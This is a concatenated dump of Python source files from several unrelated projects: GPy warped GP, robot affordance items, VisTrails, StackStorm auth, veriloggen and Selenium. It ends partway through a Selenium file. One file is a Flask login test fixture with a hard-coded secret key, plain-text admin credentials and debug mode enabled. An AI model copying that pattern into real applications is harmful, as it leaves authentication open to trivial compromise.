        :param kernel: GPy kernel; defaults to RBF over all input dims
        :param warping_function: warping function object; defaults to a
            tanh warping function with `warping_terms` terms
        :param warping_terms: number of terms for the default warping
        """
        if kernel is None:
            kernel = kern.RBF(X.shape[1])
        # Fixed: was `warping_function == None`; identity check is the
        # correct (and safe) way to test for the default.
        if warping_function is None:
            self.warping_function = TanhWarpingFunction_d(warping_terms)
            self.warping_params = (np.random.randn(self.warping_function.n_terms * 3 + 1) * 1)
        else:
            self.warping_function = warping_function
        self.scale_data = False
        if self.scale_data:
            Y = self._scale_data(Y)
        self.Y_untransformed = Y.copy()
        self.predict_in_warped_space = True
        likelihood = likelihoods.Gaussian()
        GP.__init__(self, X, self.transform_data(), likelihood=likelihood, kernel=kernel)
        self.link_parameter(self.warping_function)

    def _scale_data(self, Y):
        """Rescale Y into [-0.5, 0.5], remembering min/max for unscaling."""
        self._Ymax = Y.max()
        self._Ymin = Y.min()
        return (Y - self._Ymin) / (self._Ymax - self._Ymin) - 0.5

    def _unscale_data(self, Y):
        """Invert _scale_data()."""
        return (Y + 0.5) * (self._Ymax - self._Ymin) + self._Ymin

    def parameters_changed(self):
        """Refresh the warped targets and compute warping-parameter gradients."""
        self.Y[:] = self.transform_data()
        super(WarpedGP, self).parameters_changed()
        Kiy = self.posterior.woodbury_vector.flatten()
        grad_y = self.warping_function.fgrad_y(self.Y_untransformed)
        grad_y_psi, grad_psi = self.warping_function.fgrad_y_psi(self.Y_untransformed,
                                                                return_covar_chain=True)
        # Jacobian term (from log|df/dy|) and quadratic-form term (from the
        # GP marginal), both summed over data points and output dims.
        djac_dpsi = ((1.0 / grad_y[:, :, None, None]) * grad_y_psi).sum(axis=0).sum(axis=0)
        dquad_dpsi = (Kiy[:, None, None, None] * grad_psi).sum(axis=0).sum(axis=0)
        warping_grads = -dquad_dpsi + djac_dpsi
        self.warping_function.psi.gradient[:] = warping_grads[:, :-1]
        self.warping_function.d.gradient[:] = warping_grads[0, -1]

    def transform_data(self):
        """Return the warped targets f(Y)."""
        Y = self.warping_function.f(self.Y_untransformed.copy()).copy()
        return Y

    def log_likelihood(self):
        """GP marginal likelihood plus the log-Jacobian of the warping."""
        ll = GP.log_likelihood(self)
        jacobian = self.warping_function.fgrad_y(self.Y_untransformed)
        return ll + np.log(jacobian).sum()

    def plot_warping(self):
        """Plot the warping function over the observed Y range."""
        self.warping_function.plot(self.Y_untransformed.min(), self.Y_untransformed.max())

    def _get_warped_term(self, mean, std, gh_samples, pred_init=None):
        # Inverse-warp the quadrature locations mean + sqrt(2)*std*x.
        arg1 = gh_samples.dot(std.T) * np.sqrt(2)
        arg2 = np.ones(shape=gh_samples.shape).dot(mean.T)
        return self.warping_function.f_inv(arg1 + arg2, y=pred_init)

    def _get_warped_mean(self, mean, std, pred_init=None, deg_gauss_hermite=100):
        """
        Calculate the warped mean by using Gauss-Hermite quadrature.
        """
        gh_samples, gh_weights = np.polynomial.hermite.hermgauss(deg_gauss_hermite)
        gh_samples = gh_samples[:,None]
        gh_weights = gh_weights[None,:]
        return gh_weights.dot(self._get_warped_term(mean, std, gh_samples)) / np.sqrt(np.pi)

    def _get_warped_variance(self, mean, std, pred_init=None, deg_gauss_hermite=100):
        """
        Calculate the warped variance by using Gauss-Hermite quadrature.
        """
        gh_samples, gh_weights = np.polynomial.hermite.hermgauss(deg_gauss_hermite)
        gh_samples = gh_samples[:,None]
        gh_weights = gh_weights[None,:]
        arg1 = gh_weights.dot(self._get_warped_term(mean, std, gh_samples,
                                                    pred_init=pred_init) ** 2) / np.sqrt(np.pi)
        arg2 = self._get_warped_mean(mean, std, pred_init=pred_init,
                                     deg_gauss_hermite=deg_gauss_hermite)
        return arg1 - (arg2 ** 2)

    def predict(self, Xnew, which_parts='all', pred_init=None, full_cov=False, Y_metadata=None,
                median=False, deg_gauss_hermite=100):
        """Predict at Xnew in the original (un-warped) output space.

        :param median: if True, return the warped median instead of the
            quadrature mean
        :returns: (mean, variance) in the un-warped space
        """
        mu, var = GP._raw_predict(self, Xnew)
        mean, var = self.likelihood.predictive_values(mu, var)
        if self.predict_in_warped_space:
            std = np.sqrt(var)
            if median:
                wmean = self.warping_function.f_inv(mean, y=pred_init)
            else:
                wmean = self._get_warped_mean(mean, std, pred_init=pred_init,
                                              deg_gauss_hermite=deg_gauss_hermite).T
            wvar = self._get_warped_variance(mean, std, pred_init=pred_init,
                                             deg_gauss_hermite=deg_gauss_hermite).T
        else:
            wmean = mean
            wvar = var
        if self.scale_data:
            # BUG FIX: the original referenced an undefined name `pred` here,
            # a guaranteed NameError whenever scale_data is True. Unscale the
            # mean instead. NOTE(review): the variance would need scaling by
            # (Ymax - Ymin)**2 -- confirm before enabling scale_data.
            wmean = self._unscale_data(wmean)
        return wmean, wvar

    def predict_quantiles(self, X, quantiles=(2.5, 97.5), Y_metadata=None):
        """
        Get the predictive quantiles around the prediction at X

        :param X: The points at which to make a prediction
        :type X: np.ndarray (Xnew x self.input_dim)
        :param quantiles: tuple of quantiles, default is (2.5, 97.5) which is the 95% interval
        :type quantiles: tuple
        :returns: list of quantiles for each X and predictive quantiles for interval combination
        :rtype: [np.ndarray (Xnew x self.input_dim), np.ndarray (Xnew x self.input_dim)]
        """
        m, v = self._raw_predict(X, full_cov=False)
        if self.normalizer is not None:
            m, v = self.normalizer.inverse_mean(m), self.normalizer.inverse_variance(v)
        a, b = self.likelihood.predictive_quantiles(m, v, quantiles, Y_metadata)
        if not self.predict_in_warped_space:
            return [a, b]
        # Quantiles map directly through the monotonic inverse warping.
        new_a = self.warping_function.f_inv(a)
        new_b = self.warping_function.f_inv(b)
        return [new_a, new_b]
if __name__ == '__main__':
    # Quick smoke test: fit a warped GP to noisy sine data.
    X = np.random.randn(100, 1)
    Y = np.sin(X) + np.random.randn(100, 1)*0.05
    m = WarpedGP(X, Y)
|
data/RobotLocomotion/director/src/python/director/affordanceitems.py
|
import director
import director.objectmodel as om
from director import visualization as vis
from director.visualization import PolyDataItem
from director import filterUtils
from director import ioUtils
from director import meshmanager
from director import transformUtils
from director.uuidutil import newUUID
from director.debugVis import DebugData
from director import vtkAll as vtk
import numpy as np
import os
import uuid
from collections import OrderedDict
class AffordanceItem(PolyDataItem):
    """Base class for affordance scene objects: poly-data items with a pose,
    a UUID, and dict-based (de)serialization via descriptions."""

    COPY_MODE_ALL = 0
    COPY_MODE_SKIP_LOCAL = 1

    # Properties that are per-instance and must not be copied when syncing
    # with COPY_MODE_SKIP_LOCAL.
    # BUG FIX: ('Visible') is just the string 'Visible', so the membership
    # test in syncProperties did substring matching; it must be a tuple.
    LOCAL_PROPERTY_NAMES = ('Visible',)

    def __init__(self, name, polyData, view):
        PolyDataItem.__init__(self, name, polyData, view)
        self.params = {}
        self.addProperty('uuid', newUUID(), attributes=om.PropertyAttributes(hidden=True))
        self.addProperty('Collision Enabled', True)
        # Pose as 7 floats: position followed by a quaternion (identity
        # default) -- component order assumed (x,y,z, w,x,y,z); TODO confirm.
        self.addProperty('Origin', [0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0], attributes=om.PropertyAttributes(hidden=True))
        self.addProperty('Camera Texture Enabled', False)
        self.properties.setPropertyIndex('Collision Enabled', 0)
        self.setProperty('Icon', om.Icons.Hammer)

    def getPose(self):
        """Return (position, quaternion) of this item's child frame."""
        childFrame = self.getChildFrame()
        t = childFrame.transform if childFrame else vtk.vtkTransform()
        return transformUtils.poseFromTransform(t)

    def getDescription(self):
        """Serializable dict: class name, all properties, and the pose."""
        d = OrderedDict()
        d['classname'] = type(self).__name__
        d.update(self.properties._properties)
        d['pose'] = self.getPose()
        return d

    def _onPropertyChanged(self, propertySet, propertyName):
        PolyDataItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName == 'Origin':
            self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        # BUG FIX: this was defined without `self`, so the bound-method call
        # above raised TypeError for any subclass that didn't override it.
        pass

    def setPolyData(self, polyData):
        # Store the geometry relative to the 'Origin' pose so the child
        # frame fully determines world placement.
        if polyData.GetNumberOfPoints():
            originPose = self.getProperty('Origin')
            pos, quat = originPose[:3], originPose[3:]
            t = transformUtils.transformFromPose(pos, quat)
            polyData = filterUtils.transformPolyData(polyData, t.GetLinearInverse())
        PolyDataItem.setPolyData(self, polyData)

    def repositionFromDescription(self, desc):
        """Move the child frame to the pose stored in a description dict."""
        position, quat = desc['pose']
        t = transformUtils.transformFromPose(position, quat)
        self.getChildFrame().copyFrame(t)

    def loadDescription(self, desc, copyMode=COPY_MODE_ALL):
        """Apply properties and pose from a description dict, then re-render."""
        self.syncProperties(desc, copyMode)
        self.repositionFromDescription(desc)
        self._renderAllViews()

    def syncProperties(self, desc, copyMode=COPY_MODE_ALL):
        """Copy matching properties from desc, optionally skipping local ones."""
        # NOTE: Python 2 dict API (iteritems); use items() when porting to 3.
        for propertyName, propertyValue in desc.iteritems():
            if copyMode == self.COPY_MODE_SKIP_LOCAL:
                if propertyName in self.LOCAL_PROPERTY_NAMES:
                    continue
            # Only write on change to avoid spurious property notifications.
            if self.hasProperty(propertyName) and (self.getProperty(propertyName) != propertyValue):
                self.setProperty(propertyName, propertyValue)

    def onRemoveFromObjectModel(self):
        PolyDataItem.onRemoveFromObjectModel(self)
class BoxAffordanceItem(AffordanceItem):
    """Box affordance whose mesh tracks 'Dimensions' and 'Subdivisions'."""

    def __init__(self, name, view):
        AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
        dimsAttributes = om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4)
        self.addProperty('Dimensions', [0.25, 0.25, 0.25], attributes=dimsAttributes)
        self.addProperty('Subdivisions', 0, attributes=om.PropertyAttributes(minimum=0, maximum=1000))
        self.properties.setPropertyIndex('Dimensions', 0)
        self.properties.setPropertyIndex('Subdivisions', 1)
        self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        """Rebuild the box mesh from the current property values."""
        builder = DebugData()
        builder.addCube(self.getProperty('Dimensions'), (0,0,0), subdivisions=self.getProperty('Subdivisions'))
        self.setPolyData(builder.getPolyData())

    def _onPropertyChanged(self, propertySet, propertyName):
        AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName in ('Dimensions', 'Subdivisions'):
            self.updateGeometryFromProperties()
class SphereAffordanceItem(AffordanceItem):
    """Sphere affordance whose mesh tracks its 'Radius' property."""

    def __init__(self, name, view):
        AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
        radiusAttributes = om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4)
        self.addProperty('Radius', 0.15, attributes=radiusAttributes)
        self.properties.setPropertyIndex('Radius', 0)
        self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        """Rebuild the sphere mesh from the current radius."""
        builder = DebugData()
        builder.addSphere((0,0,0), self.getProperty('Radius'))
        self.setPolyData(builder.getPolyData())

    def _onPropertyChanged(self, propertySet, propertyName):
        AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName == 'Radius':
            self.updateGeometryFromProperties()
class CylinderAffordanceItem(AffordanceItem):
    """Cylinder affordance defined by 'Radius' and 'Length' properties."""

    def __init__(self, name, view):
        AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
        self.addProperty('Radius', 0.03, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
        self.addProperty('Length', 0.5, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
        self.properties.setPropertyIndex('Radius', 0)
        self.properties.setPropertyIndex('Length', 1)
        self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        """Rebuild the cylinder mesh from the current properties."""
        d = DebugData()
        # Fix: `length` was computed but unused; pass it to the call
        # instead of fetching the property a second time.
        length = self.getProperty('Length')
        d.addCylinder(center=(0,0,0), axis=(0,0,1), length=length, radius=self.getProperty('Radius'))
        self.setPolyData(d.getPolyData())

    def _onPropertyChanged(self, propertySet, propertyName):
        AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName in ('Length', 'Radius'):
            self.updateGeometryFromProperties()
class CapsuleAffordanceItem(AffordanceItem):
    """Capsule affordance defined by 'Radius' and 'Length' properties."""

    def __init__(self, name, view):
        AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
        self.addProperty('Radius', 0.03, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
        self.addProperty('Length', 0.5, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
        self.properties.setPropertyIndex('Radius', 0)
        self.properties.setPropertyIndex('Length', 1)
        self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        """Rebuild the capsule mesh from the current properties."""
        d = DebugData()
        # Fix: `length` was computed but unused; pass it to the call
        # instead of fetching the property a second time.
        length = self.getProperty('Length')
        d.addCapsule(center=(0,0,0), axis=(0,0,1), length=length, radius=self.getProperty('Radius'))
        self.setPolyData(d.getPolyData())

    def _onPropertyChanged(self, propertySet, propertyName):
        AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName in ('Length', 'Radius'):
            self.updateGeometryFromProperties()
class CapsuleRingAffordanceItem(AffordanceItem):
    """A ring approximated by capsule segments between evenly spaced spokes."""

    def __init__(self, name, view):
        AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
        self.setProperty('Collision Enabled', False)
        self.addProperty('Radius', 0.15, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
        self.addProperty('Tube Radius', 0.02, attributes=om.PropertyAttributes(decimals=3, singleStep=0.01, minimum=0.0, maximum=1e4))
        self.addProperty('Segments', 8, attributes=om.PropertyAttributes(decimals=3, singleStep=1, minimum=3, maximum=100))
        self.properties.setPropertyIndex('Radius', 0)
        self.properties.setPropertyIndex('Tube Radius', 1)
        self.properties.setPropertyIndex('Segments', 2)
        self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        """Rebuild the ring: one capsule per pair of adjacent spokes."""
        radius = self.getProperty('Radius')
        # Evenly spaced angles around the circle; the endpoint is repeated
        # so the ring closes.
        circlePoints = np.linspace(0, 2*np.pi, self.getProperty('Segments')+1)
        spokes = [(0.0, np.sin(x), np.cos(x)) for x in circlePoints]
        spokes = [radius*np.array(x)/np.linalg.norm(x) for x in spokes]
        d = DebugData()
        for a, b in zip(spokes, spokes[1:]):
            d.addCapsule(center=(a+b)/2.0, axis=(b-a), length=np.linalg.norm(b-a), radius=self.getProperty('Tube Radius'))
        self.setPolyData(d.getPolyData())

    def _onPropertyChanged(self, propertySet, propertyName):
        AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName in ('Radius', 'Tube Radius', 'Segments'):
            self.updateGeometryFromProperties()
class MeshAffordanceItem(AffordanceItem):
    """Affordance backed by a mesh file, resolved via a shared MeshManager."""

    # Lazily created singleton, shared by all instances.
    _meshManager = None

    def __init__(self, name, view):
        AffordanceItem.__init__(self, name, vtk.vtkPolyData(), view)
        self.setProperty('Collision Enabled', False)
        self.addProperty('Filename', '')
        self.properties.setPropertyIndex('Filename', 0)
        # Rebuild only when a filename is set and no geometry exists yet.
        if self.getProperty('Filename') and not self.polyData.GetNumberOfPoints():
            self.updateGeometryFromProperties()

    def updateGeometryFromProperties(self):
        """Load geometry for 'Filename': try it as a mesh-manager key, then
        as a file path; fall back to a small debug frame marker."""
        filename = self.getProperty('Filename')
        if not filename:
            polyData = vtk.vtkPolyData()
        else:
            polyData = self.getMeshManager().get(filename)
        if not polyData:
            # Not a mesh-manager key; treat as a path (relative to DRC base).
            if not os.path.isabs(filename):
                filename = os.path.join(director.getDRCBaseDir(), filename)
            if os.path.isfile(filename):
                polyData = ioUtils.readPolyData(filename)
            else:
                # Placeholder geometry so the object remains visible.
                d = DebugData()
                d.addFrame(vtk.vtkTransform(), scale=0.1, tubeRadius=0.005)
                polyData = d.getPolyData()
        self.setPolyData(polyData)

    @classmethod
    def getMeshManager(cls):
        """Return the shared MeshManager, creating it on first use."""
        if cls._meshManager is None:
            cls._meshManager = meshmanager.MeshManager()
        return cls._meshManager

    @classmethod
    def promotePolyDataItem(cls, obj):
        """Replace a plain PolyDataItem with a MeshAffordanceItem.

        Stores the (frame-relative) mesh in the mesh manager, recreates the
        object under the same parent with a child frame at the original
        pose, re-parents the children, and copies the properties over.
        """
        parent = obj.parent()
        view = obj.views[0]
        name = obj.getProperty('Name')
        polyData = obj.polyData
        props = obj.properties._properties
        childFrame = obj.getChildFrame()
        if childFrame:
            t = transformUtils.copyFrame(childFrame.transform)
        else:
            # No frame yet: center the stored mesh on its centroid.
            t = vtk.vtkTransform()
            t.PostMultiply()
            t.Translate(filterUtils.computeCentroid(polyData))
        polyData = filterUtils.transformPolyData(polyData, t.GetLinearInverse())
        children = [c for c in obj.children() if c is not childFrame]
        meshId = cls.getMeshManager().add(polyData)
        om.removeFromObjectModel(obj)
        obj = MeshAffordanceItem(name, view)
        obj.setProperty('Filename', meshId)
        om.addToObjectModel(obj, parentObj=parent)
        frame = vis.addChildFrame(obj)
        frame.copyFrame(t)
        for child in children:
            om.addToObjectModel(child, parentObj=obj)
        obj.syncProperties(props)
        return obj

    def _onPropertyChanged(self, propertySet, propertyName):
        AffordanceItem._onPropertyChanged(self, propertySet, propertyName)
        if propertyName == 'Filename':
            self.updateGeometryFromProperties()
class FrameAffordanceItem(AffordanceItem):
    """Affordance parameterized by a coordinate frame (axes + origin)."""

    def setAffordanceParams(self, params):
        # params: affordance-specific key/value data (see the keys written
        # by updateParamsFromActorTransform below).
        self.params = params

    def updateParamsFromActorTransform(self):
        """Refresh stored axes/origin from the actor's user transform."""
        t = self.actor.GetUserTransform()
        xaxis = np.array(t.TransformVector([1,0,0]))
        yaxis = np.array(t.TransformVector([0,1,0]))
        zaxis = np.array(t.TransformVector([0,0,1]))
        self.params['xaxis'] = xaxis
        self.params['yaxis'] = yaxis
        self.params['zaxis'] = zaxis
        self.params['origin'] = t.GetPosition()
|
data/VisTrails/VisTrails/vistrails/db/versions/v0_7_0/persistence/xml/xml_dao.py
|
from __future__ import division
from datetime import date, datetime
from vistrails.core.system import strftime, time_strptime
class XMLDAO:
    """Helpers shared by XML persistence DAOs: DOM attribute access and
    string <-> typed-value conversion."""

    def __init__(self):
        pass

    def hasAttribute(self, node, attr):
        """Whether the DOM node carries the given attribute."""
        return node.hasAttribute(attr)

    def getAttribute(self, node, attr):
        """Return the attribute's value, or None when absent."""
        try:
            found = node.attributes.get(attr)
            if found is not None:
                return found.value
        except KeyError:
            pass
        return None

    def convertFromStr(self, value, type):
        """Parse *value* (a string) into the requested type.

        Returns None for missing values and, except for 'str', for
        whitespace-only or unrecognized-type values.
        """
        if value is None:
            return None
        if type == 'str':
            return str(value)
        if value.strip() == '':
            return None
        if type == 'long':
            return long(value)
        if type == 'float':
            return float(value)
        if type == 'int':
            return int(value)
        if type == 'date':
            return date(*time_strptime(value, '%Y-%m-%d')[0:3])
        if type == 'datetime':
            return datetime(*time_strptime(value, '%Y-%m-%d %H:%M:%S')[0:6])
        return None

    def convertToStr(self, value, type):
        """Serialize a typed value back to its XML string form ('' for None)."""
        if value is None:
            return ''
        if type == 'date':
            return value.isoformat()
        if type == 'datetime':
            return strftime(value, '%Y-%m-%d %H:%M:%S')
        return str(value)
|
data/SumitBisht/RobotFrameworkTestAutomation/Ch4/seleniumTest/src/flaskApp/hello.py
|
from flask import Flask, request, render_template, flash, redirect, url_for
app = Flask(__name__)
app.secret_key = 'AXAPBswe4B'  # required for flash() session messages

@app.route('/')
def login():
    """Serve the login form."""
    return render_template('login.html')

@app.route('/secure', methods=['POST'])
def secured():
    """Check submitted credentials; show the secure page or bounce back.

    NOTE(review): credentials are hard-coded and compared in plain text --
    acceptable only for this Selenium test fixture.
    """
    user = request.form['username']
    password = request.form['password']
    if(user == "admin" and password == "s3cur3"):
        flash("Logged in successfully")
        return render_template('secure.html')
    else:
        flash("Error while logging in with "+user)
        return redirect(url_for('login'))

if __name__ == '__main__':
    app.run(debug=True)
|
data/ResilientScience/wot/wot/dimer.py
|
import sys
import fileinput
import itertools
ALPHABET = ("A", "C", "G", "T")
def sequence_count(string, wordlength):
    """Return a frequency count of all sequences of a given size found in a string.

    Counts every overlapping substring ("word") of length `wordlength`.

    Args:
        string: the text to scan.
        wordlength: size of each word window.

    Returns:
        dict mapping each word to its number of occurrences.
    """
    counts = {}
    # Slide a window of `wordlength` across the string one position at a
    # time; dict.get() replaces the original membership-test-then-index
    # pattern (one lookup instead of two per word).
    for i in range(len(string) - wordlength + 1):
        word = string[i:i + wordlength]
        counts[word] = counts.get(word, 0) + 1
    return counts
def pretty_print(wordcount_dict, wordlength):
    """This prints out the wordcount index in order to mimic the R1.BAS output format.

    Emits one line per possible word over ALPHABET (in lexicographic order):
    the word's ordinal and its count, 0 when the word is absent.
    """
    output = ""
    for e, letters in enumerate(itertools.product(ALPHABET, repeat=wordlength)):
        word = ''.join(letters)
        # BUG FIX: the original indexed the dict directly but tried to catch
        # IndexError -- a missing word raises KeyError, so the fallback never
        # ran (and its line was an unformatted "%s\t0\n" template). Use
        # .get() with a 0 default so absent words are reported consistently.
        output += "%3.10s%13s\n" % (e, wordcount_dict.get(word, 0))
    return output
def histogram(filename, wordlength):
    """Returns a histogram report that meets NIHCC's format.

    This function returns a string that is compatible with the example code
    used Jim Deleo's Scientific Computing group at the NIH Clinical Center.
    'Pick a standard, any standard', we'll we've agreed to use this.
    """
    wc = {}
    # Use a context manager so the file handle is closed deterministically
    # (the original leaked it), and stream line by line instead of
    # materializing the whole file with readlines().
    with open(filename) as infile:
        for line in infile:
            wcnew = sequence_count(line, wordlength)
            # Merge the per-line counts into the running totals.
            wc = {i: wc.get(i, 0) + wcnew.get(i, 0) for i in set(wc) | set(wcnew)}
    return pretty_print(wc, wordlength)
if __name__ == "__main__":
    # NOTE: Python 2 print statement; this file needs print(...) under 3.
    print histogram(sys.argv[1], 3)
|
data/StackStorm/st2/st2auth/st2auth/cmd/api.py
|
import eventlet
import os
import sys
from oslo_config import cfg
from eventlet import wsgi
from st2common import log as logging
from st2common.service_setup import setup as common_setup
from st2common.service_setup import teardown as common_teardown
from st2common.util.monkey_patch import monkey_patch
from st2common.constants.auth import VALID_MODES
from st2auth import config
config.register_opts()
from st2auth import app
__all__ = [
'main'
]
monkey_patch()
LOG = logging.getLogger(__name__)
def _setup():
    """Initialize common st2 services (config, logging, DB) for the auth API.

    Raises ValueError when the configured auth mode is not recognized.
    """
    common_setup(service='auth', config=config, setup_db=True, register_mq_exchanges=False,
                 register_signal_handlers=True, register_internal_trigger_types=False,
                 run_migrations=False)
    if cfg.CONF.auth.mode not in VALID_MODES:
        raise ValueError('Valid modes are: %s' % (','.join(VALID_MODES)))
def _run_server():
    """Bind the listen socket (optionally TLS-wrapped) and serve the WSGI app.

    Blocks inside eventlet's WSGI server until it stops, then returns 0.
    """
    host = cfg.CONF.auth.host
    port = cfg.CONF.auth.port
    use_ssl = cfg.CONF.auth.use_ssl
    cert_file_path = os.path.realpath(cfg.CONF.auth.cert)
    key_file_path = os.path.realpath(cfg.CONF.auth.key)
    # Validate TLS material up front so we fail before binding the port.
    if use_ssl and not os.path.isfile(cert_file_path):
        raise ValueError('Certificate file "%s" doesn\'t exist' % (cert_file_path))
    if use_ssl and not os.path.isfile(key_file_path):
        raise ValueError('Private key file "%s" doesn\'t exist' % (key_file_path))
    socket = eventlet.listen((host, port))
    if use_ssl:
        socket = eventlet.wrap_ssl(socket,
                                   certfile=cert_file_path,
                                   keyfile=key_file_path,
                                   server_side=True)
    LOG.info('ST2 Auth API running in "%s" auth mode', cfg.CONF.auth.mode)
    LOG.info('(PID=%s) ST2 Auth API is serving on %s://%s:%s.', os.getpid(),
             'https' if use_ssl else 'http', host, port)
    wsgi.server(socket, app.setup_app())
    return 0
def _teardown():
    """Release resources acquired by _setup()."""
    common_teardown()
def main():
    """Entry point: set up services, run the auth API server, tear down.

    Returns a process exit code (0 on clean shutdown, 1 on error).
    """
    try:
        _setup()
        return _run_server()
    except SystemExit as exit_code:
        # BUG FIX: propagate the actual exit code. Passing the SystemExit
        # *instance* to sys.exit() makes the interpreter print the object
        # and exit with status 1 regardless of the original code.
        sys.exit(exit_code.code)
    except Exception:
        LOG.exception('(PID=%s) ST2 Auth API quit due to exception.', os.getpid())
        return 1
    finally:
        _teardown()
|
data/SEED-platform/seed/setup.py
|
# Packaging metadata for the SEED platform (installed via `pip install .`).
from setuptools import setup, find_packages
setup(
    name='seed',
    version='0.1.0',
    packages=find_packages(),
    url='',
    license='revised BSD',
    author='Richard Brown',
    author_email='rebrown@lbl.gov',
    description='The SEED Platform is a web-based application that helps organizations easily manage data on the energy performance of large groups of buildings.',
    # Command-line helper installed onto PATH.
    scripts=['bin/seedutil']
)
|
data/PyHDI/veriloggen/tests/core/systemtask/systemtask.py
|
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
def mkLed():
    """Build the 'blinkled' veriloggen module: a free-running counter that
    advances LED every 1024 cycles and emits a $display system task."""
    m = Module('blinkled')
    width = m.Parameter('WIDTH', 8)
    clk = m.Input('CLK')
    rst = m.Input('RST')
    led = m.OutputReg('LED', width)
    count = m.Reg('count', 32)
    # Counter process: reset to 0, otherwise count up and wrap at 1024.
    m.Always(Posedge(clk))(
        If(rst)(
            count(0)
        ).Else(
            If(count == 1023)(
                count(0)
            ).Else(
                count(count + 1)
            )
        ))
    # LED process: on the wrap cycle, increment LED and $display its value.
    m.Always(Posedge(clk))(
        If(rst)(
            led(0)
        ).Else(
            If(count == 1024 - 1)(
                led(led + 1),
                SingleStatement(SystemTask('display', 'led:%x', led))
            )
        ))
    return m
if __name__ == '__main__':
    # Generate and print the Verilog source for the module above.
    led = mkLed()
    verilog = led.to_verilog()
    print(verilog)
|
data/RoseOu/flasky/venv/lib/python2.7/site-packages/selenium/webdriver/firefox/firefox_binary.py
|
import os
import platform
from subprocess import Popen, STDOUT
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common import utils
import time
class FirefoxBinary(object):
NO_FOCUS_LIBRARY_NAME = "x_ignore_nofocus.so"
    def __init__(self, firefox_path=None, log_file=None):
        """
        Creates a new instance of Firefox binary.

        :Args:
         - firefox_path - Path to the Firefox executable. By default, it will be detected from the standard locations.
         - log_file - A file object to redirect the firefox process output to. It can be sys.stdout.
           Please note that with parallel run the output won't be synchronous.
           By default, it will be redirected to /dev/null.
        """
        self._start_cmd = firefox_path
        # Discard browser output unless the caller supplied a log file.
        self._log_file = log_file or open(os.devnull, "wb")
        self.command_line = None
        if self._start_cmd is None:
            self._start_cmd = self._get_firefox_start_cmd()
        if not self._start_cmd.strip():
            raise Exception("Failed to find firefox binary. You can set it by specifying the path to 'firefox_binary':\n\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\n" +
                            "binary = FirefoxBinary('/path/to/binary')\ndriver = webdriver.Firefox(firefox_binary=binary)")
        # Launch environment: no crash reporter, no remoting to an
        # already-running instance, no extension-manager restart.
        self._firefox_env = os.environ.copy()
        self._firefox_env["MOZ_CRASHREPORTER_DISABLE"] = "1"
        self._firefox_env["MOZ_NO_REMOTE"] = "1"
        self._firefox_env["NO_EM_RESTART"] = "1"
    def add_command_line_options(self, *args):
        # Extra CLI flags appended when the browser is launched.
        self.command_line = args
    def launch_browser(self, profile):
        """Launches the browser for the given profile name.

        It is assumed the profile already exists.
        """
        self.profile = profile
        self._start_from_profile_path(self.profile.path)
        self._wait_until_connectable()
def kill(self):
"""Kill the browser.
This is useful when the browser is stuck.
"""
if self.process:
self.process.kill()
self.process.wait()
    def _start_from_profile_path(self, path):
        """Start firefox against the given profile directory.

        Firefox is first run with -silent so it can import/prepare the
        profile (that process is waited on), then the real browser process
        is started with -foreground and kept in self.process.
        """
        self._firefox_env["XRE_PROFILE_PATH"] = path
        if platform.system().lower() == 'linux':
            self._modify_link_library_path()
        command = [self._start_cmd, "-silent"]
        if self.command_line is not None:
            for cli in self.command_line:
                command.append(cli)
        # First run: profile initialization; blocks until firefox exits.
        Popen(command, stdout=self._log_file, stderr=STDOUT,
              env=self._firefox_env).communicate()
        # Second run: swap -silent for -foreground and keep the process.
        command[1] = '-foreground'
        self.process = Popen(
            command, stdout=self._log_file, stderr=STDOUT,
            env=self._firefox_env)
def _wait_until_connectable(self):
    """Blocks until the extension is connectable in the firefox.

    Polls the profile's port once per second. Raises WebDriverException
    when the browser process exits early, or after 30 failed attempts.
    Returns True once connectable.
    """
    count = 0
    while not utils.is_connectable(self.profile.port):
        if self.process.poll() is not None:
            # Browser died before the extension came up.
            raise WebDriverException("The browser appears to have exited "
                  "before we could connect. If you specified a log_file in "
                  "the FirefoxBinary constructor, check it for details.")
        if count == 30:
            self.kill()
            # BUG FIX: the message contains a %s placeholder but no value
            # was ever interpolated, so users saw a literal "%s" instead of
            # the profile directory. Supply self.profile.path.
            raise WebDriverException("Can't load the profile. Profile "
                  "Dir: %s If you specified a log_file in the "
                  "FirefoxBinary constructor, check it for details."
                  % self.profile.path)
        count += 1
        time.sleep(1)
    return True
def _find_exe_in_registry(self):
    """Look up the firefox launch command in the Windows registry.

    Checks HKLM then HKCU for the FirefoxHTML / firefox.exe open-command
    keys and returns the executable path (first shlex token of the
    command), or "" when nothing is registered.
    """
    try:
        # Python 2 module name first, Python 3 fallback.
        from _winreg import OpenKey, QueryValue, HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER
    except ImportError:
